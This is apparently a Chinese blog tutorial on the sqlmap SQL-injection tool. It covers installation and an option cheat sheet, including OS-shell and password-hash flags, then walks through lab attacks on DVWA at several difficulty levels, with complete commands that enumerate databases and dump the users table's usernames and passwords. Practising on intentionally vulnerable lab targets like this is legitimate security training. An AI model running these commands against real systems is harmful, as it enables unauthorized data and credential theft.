SQLMap 扫描利用SQL注入

已于 2022-12-21 16:40:47 修改
阅读量1.2k 收藏 26
点赞数 2
分类专栏: 安全 文章标签: SQL注入 sqlmap
于 2022-12-21 10:52:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leiwuhen92/article/details/128394254
版权

一、SQLMap介绍

SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。
注意:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点
SQLMap采用了以下5种独特的SQL注入技术:
  • 基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
  • 基于时间的盲注即不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否己执行(即页面返回时间是否增加)来判断
  • 基于报错注入即页面会返回错误信息,或者把注入的语句的结果直接返回到页面中。
  • 联合查询注入,在可以使用Union 的情况下的注入。. 堆查询注入,可以同时执行多条语句时的注入
SQLMap 的强大的功能包括数据库指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时实行任意命令。

二、安装

1、安装git
    apt-get install git
2、克隆sqlmap
    git clone git://github.com/sqlmapproject/sqlmap.git
3、测试sqlmap是否正常工作,前提要安装python2:apt install python2
     cd sqlmap/
     ./sqlmap.py -h
查看sqlmap的命令字帮助手册
-"url"       #检测注入点
--dbs           #列出所有数据库的名称
--current-db    #列出当前数据库的名称
-D              #指定一个数据库
--table         #列出所有表名
-T              #指定表名
--columns       #列出所有字段名
-C              #指定字段
--dump          #列出字段内容
--os-shell      # 提示输入交互式操作系统shell
--os-cmd=OSCMD  # Execute an operating system command
--passwords     # 枚举DBMS用户密码哈希
-v VERBOSE用于设置输出消息的详细级别。存在七个级别的冗长。默认级别为 1。
  • 0:仅显示 Python 回溯、错误和关键消息。
  • 1:还显示信息和警告消息。
  • 2:还显示调试消息。
  • 3:还显示注入的有效负载。
  • 4:还显示 HTTP 请求。
  • 5:还显示 HTTP 响应的标头。
  • 6:还显示 HTTP 响应的页面内容。
sqlmap.py -u "注入地址"  --dbs            # 列举数据库
sqlmap.py -u "注入地址"  --current--db    # 当前数据库
sqlmap.py -u "注入地址"  --users          # 列数据库用户
sqlmap.py -u "注入地址"  --current--user  # 当前用户
sqlmap.py -u "注入地址"  --tables -D "数据库"   # 列举指定数据库的表名
sqlmap.py -u "注入地址"  --columns -T "表名" -D "数据库"  # 获取数据库表的列名
sqlmap.py -u "注入地址"  --dump -T "表名" -D "数据库"  # 获取数据库表的所有内容
sqlmap.py -u "注入地址" --dump -C "列名字1, 列名字2" -T "表名字" -D "数据库"   # 获取数据库下表的列信息

三、Kail自带的sqlmap更新

先输入 sqlmap -update命令 但是命令没有成功 看来是不对的。
1、找到sqlmap的安装路径 因为kali自带sqlmap所以一般的路径都是/usr/share/sqlmap;
2、cd /usr/share/
3、删除掉原来的sqlmap:rm -rf sqlmap
5、更新完成了输入sqlmap -h

四、kail+靶机演示

4.1、dvwa(Low)GET请求

4.1.1、环境准备

1、登录Metasploitable2靶机的http://192.168.11.105/dvwa,输入用户密码:admin/password, dvwa版本:  Version 1.0.7 (Release date: 08/09/10)
2、点击"DVWA Security",首先将难度调整为Low。
3、点击SQL Injection,我们在查询接口输入User Id为1进行查询,这时候生成的地址就是我们的目标注入点http://192.168.11.105/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#,同时Cookie的值是security=low; PHPSESSID=4e495964246e2b0f5591550ce44e3979

4.1.2、注入探测

sqlmap -u "http://192.168.11.105/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4e495964246e2b0f5591550ce44e3979"
可以看出,爆出了SQL注入漏洞,探测到数据库是mysql,版本4.1以上,所在操作系统Linux Ubuntu 8.04。
当SQLMap执行该命令时,它会执行以下步骤:
    1)判断可注入的参数;
    2)判断可以用哪种SQL注入技术来注入;
    3)识别出哪种数据库;
    4)根据用户选择,读取哪些数据。

4.1.3、获取所有数据库

sqlmap -u "http://192.168.11.105/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4e495964246e2b0f5591550ce44e3979" --dbs
可以看出列出了7个数据库名。

4.1.4、获取指定数据库内的所有表

sqlmap -u "http://192.168.11.105/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4e495964246e2b0f5591550ce44e3979" --tables -D dvwa

4.1.5、查看用户表中的所有数据

sqlmap -u "http://192.168.11.105/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4e495964246e2b0f5591550ce44e3979" --dump -T users -D dvwa

4.1.6、获取指定表中列名

sqlmap -u "http://192.168.11.105/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4e495964246e2b0f5591550ce44e3979" --columns -T users -D dvwa

4.1.7、获取指定表中指定列的值

sqlmap -u "http://192.168.11.105/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4e495964246e2b0f5591550ce44e3979" --dump -C "user, password" -T users -D dvwa
dvwa版本:  Version 1.0.7 (Release date: 08/09/10),调整为medium级别后,SQL注入还是GET方式,跟low级别一样,推测是dvwa版本太低导致。
故docker搭建新的一套dvwa环境(docker run --name dvwa -d -p 80:80 -p 3306:3306 -e MYSQL_PASS="root" citizenstig/dvwa,dvwa版本: Version 1.9 (Release date: 2015-09-19))。

4.2、dvwa(Medium) POST请求

dvwa版本: Version 1.9 (Release date: 2015-09-19)

4.2.1、调整靶场难度等级为中级

4.2.2、确定注入点

难度调整为中级之后,请求方式变成了post,查询输入接口由手动输入变成了选择方式,且在url不会直接显示我们的查询请求。
Cookie:PHPSESSID=dsjlh0p07q8a97r3m35egtq621; security=medium

4.2.3、注入探测

sqlmap -u "http://192.168.11.135/vulnerabilities/sqli/" --cookie="PHPSESSID=dsjlh0p07q8a97r3m35egtq621; security=medium" --data "id=1&Submit=Submit"

4.2.4、获取所有数据库

sqlmap -u "http://192.168.11.135/vulnerabilities/sqli/" --cookie="PHPSESSID=dsjlh0p07q8a97r3m35egtq621; security=medium" --data "id=1&Submit=Submit" --dbs
可以看出列出了4个数据库名。

4.2.5、获取指定数据库内的所有表

sqlmap -u "http://192.168.11.135/vulnerabilities/sqli/" --cookie="PHPSESSID=dsjlh0p07q8a97r3m35egtq621; security=medium" --data "id=1&Submit=Submit" --tables -D dvwa

4.2.6、查看用户表中的所有数据

sqlmap -u "http://192.168.11.135/vulnerabilities/sqli/" --cookie="PHPSESSID=dsjlh0p07q8a97r3m35egtq621; security=medium" --data "id=1&Submit=Submit"  --dump -T users -D dvwa

4.2.7、获取指定表中列名

sqlmap -u "http://192.168.11.135/vulnerabilities/sqli/" --cookie="PHPSESSID=dsjlh0p07q8a97r3m35egtq621; security=medium" --data "id=1&Submit=Submit"  --columns -T users -D dvwa

4.2.8、获取指定表中指定列的值

sqlmap -u "http://192.168.11.135/vulnerabilities/sqli/" --cookie="PHPSESSID=dsjlh0p07q8a97r3m35egtq621; security=medium" --data "id=1&Submit=Submit"  --dump -C "user, password" -T users -D dvwa

4.3、dvwa(High)

dvwa版本: Version 1.9 (Release date: 2015-09-19)

4.3.1、调整级别

将DVWA难度调整为high之后,可以看到high等级的输入查询在弹窗进行输入,而数据显示确在原窗口进行显示。
原窗口数据包请求方式为GET
Cookie:PHPSESSID=dsjlh0p07q8a97r3m35egtq621; security=high
弹出的输入窗口请求方式为POST
Cookie:PHPSESSID=dsjlh0p07q8a97r3m35egtq621; security=high
负载:id=1&Submit=Submit

4.3.2、需要用到联合查询命令‘second-url’

sqlmap -u "http://192.168.11.135/vulnerabilities/sqli/session-input.php" --cookie="PHPSESSID=dsjlh0p07q8a97r3m35egtq621; security=high" --data "id=1&Submit=Submit" --second-u "http://192.168.11.135/vulnerabilities/sqli/"

4.4、dvwa(Impossible)

dvwa版本: Version 1.9 (Release date: 2015-09-19)
Low、Medium、High级别其实都是通过限制数据输入来起到防护作用,而我们在手工注入的时候通过使用burpsuit等抓包工具篡改数据包都是可以绕过它的限制的。
Impossible等级则是在数据传到后端之后先进行了格式验证,然后还使用了PDO预处理。人家都说了Impossible,目前是无法进行注入的。
 

五、-r参数(从文本文件中获取http请求)

命令实例: sqlmap -r /usr/a.txt
说明:使用该命令时须指明a.txt(保存着http请求包)文件所在的绝对路径
验证过程与-u参数类似
  1. 判断可注入的参数
  2. 判断可以用哪种SQL注入技术来注入
  3. 识别出所有存在的注入类型
  4. 尝试去判定数据库版本、开发语言、操作系统版本

5.1、dvwa(Low) GET请求

利用Burpsuite截取HTTP Request报文,将截取到的HTTP Request报文保存在文本文件中
爆当前数据库的库名sqlmap -r /usr/share/sqlmap/zq.txt --current-db
生成缓存:/root/.local/share/sqlmap/output/192.168.11.135

5.2、dvwa(Medium) POST请求

利用Burpsuite截取HTTP Request报文,将截取到的HTTP Request报文保存在文本文件中
删除缓存:rm -rf  /root/.local/share/sqlmap/output/192.168.11.135
爆当前数据库的库名sqlmap -r /usr/share/sqlmap/zq.txt --current-db 
 

六、参考

青霄
关注
  • 2
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ifconfig查看的ip与设置ip不一致,且重启网络失败
parker007的专栏
02-20 5899
问题如下: 1、设置了静态IP,执行# service network restart 失败 2、# ifconfig查看显示的IP与实际设置的IP不一致,设置的是192.168.11.2,查看显示的是192.168.11.105   首先看问题:执行service network restart命令后出现下面的错误: 根据提示输入systemctl status network.s...
sqlmap自动扫描注入点_简记——利用sqlmap检测网站sql注入漏洞获取数据
weixin_39834488的博客
11-26 1592
sqlmap是一个开源软件,用于检测和利用数据库漏洞,并提供了将恶意代码注入其中的选项。[1]它是一种渗透测试工具,可在终端中提供其用户界面,从而自动检测和利用SQL注入漏洞的过程。[2]该软件在命令行运行,可以下载用于不同的操作系统:Linux发行版,Windows和Mac OS操作系统。[3]除了映射和检测漏洞之外,该软件还可以访问数据库,编辑和删除数据以及查看表中的数据,例如用户,密码,备份...
4、Metasploit系列----未知目标测试
无痕的博客
12-13 404
metasploit对未知目标测试
SQL注入漏洞扫描---sqlmap
最新发布
嘿嘿嘿
05-03 2156
数据库--数据表---字段---字段内容一站式识别
远程修改本地计算机策略
weixin_34067980的博客
02-16 314
本次实验我们用两台虚拟机PERTH(192.168.11.105)和ISTANBUL(192.168.11.102),PERTH是故障计算机,ISTANBUL对它远程进行修复,两台虚拟机用LOCAL .LY相连. 实验开始,在PERTH上,打开MMC控制台,点击文件-->添加删除管理单元-->组策略对象编辑器 然后在本地计...
11、setoolkit工具 构造钓鱼网站、powershell注入
无痕的博客
12-13 602
setoolkit工具的安装,用于 构造钓鱼网站、powershell注入
sqlmap命令详解
Pitbull2014的博客
12-20 1077
cookie注入sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sq...
sqlmap漏洞扫描工具
10-18
SQLMAP是一款跨平台,开源的SQL注入“企业级”工具,但同时也是很适合个人学习的工具,功能强大.
使用sqlmap进行SQL注入检测
博客
08-22 7074
最近公司项目被扫描出有SQL注入的漏洞,通过百度之后,决定使用sqlmap进行SQL注入的检测。这里仅仅是记录一下注入检测的步骤。 检测前准备 sqlmap是一个python编写的工具,因此我们首先要进行python环境的搭建,然后再从sqlmap官网下载最新版本。 检测步骤 查看需要检测的注入点 首先我们需要访问自己的项目,找到一个需要检测的url,这个url需要对应后台的处理,这个u...
sqlmap自动扫描注入点_SQLMAP使用指南[学员作品]
weixin_39926311的博客
11-26 997
文章作者:小酱团队交流群:673441920-----------------------------------------------------------目录什么是SQLMAPSQLMAP的安装 常见数据库的结构 SQLMAP参数 SQLMAP扫描漏洞 SQLMAP的性能优化SQLMAP的进阶用法 1、什么是SQLMAPSqlmap是一款由Python语言编写的开源sql注入检测、利...
SQL注入漏洞扫描检测
12-20
SQL注入检测的全套代码和论文介绍,C#,Web应用漏洞检测技术,是一种针对web应用的积极防御技术。该技术在应用尚未遭受攻击前,模拟黑客攻击的方式对目标系统进行各种探测,发现系统潜在的漏洞。由于web应用工作在HTTP应用层协议上,所以传统的防火墙、IDS等网络层防护设备不能对其进行保护,此时就需要web应用漏洞检测工具对系统的应用层进行保护,二者互补不足,共同保护web系统的安全。
自己动手编写SQL注入漏洞扫描工具
12-31
在CSDN上没有找到,所以将别处下载的上传过来,必须免费分享! 包括两个程序,代码尚未调试,希望有所借鉴。 代码仅供学习交流,切勿行危害安全之事,务必遵守法律法规!
sqlmap SQL注入扫描软件
03-29
自动扫描sql注入
sql注入扫描_sqlmap-1.1.3.zip
02-13
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了。现在支持python3了
基于sqlmap的被动SQL注入扫描技术研究与实现.pdf
09-19
基于sqlmap的被动SQL注入扫描技术研究与实现.pdf
Sqlmap 注入神器 支持各种sql注入
04-03
sql注入神器 支持各种sql注入,可进行sql扫描、暴库等操作
sqlmap进行sql注入测试的报告
02-09
sqlmap是一款开源的SQL注入自动化工具。它可以帮助渗透测试人员自动化地扫描Web应用程序并检测SQL注入漏洞。 在进行SQL注入测试时,sqlmap会尝试将恶意SQL语句注入到Web应用程序的输入字段中,并检测程序是否可以执行这些语句。如果程序可以执行恶意语句,则说明存在SQL注入漏洞。 在测试结束后,sqlmap会生成一份报告,其中包含测试结果、发现的漏洞信息以及执行的SQL注入攻击。这份报告可以帮助安全人员了解应用程序中存在的安全漏洞,并采取相应的措施来修复这些漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值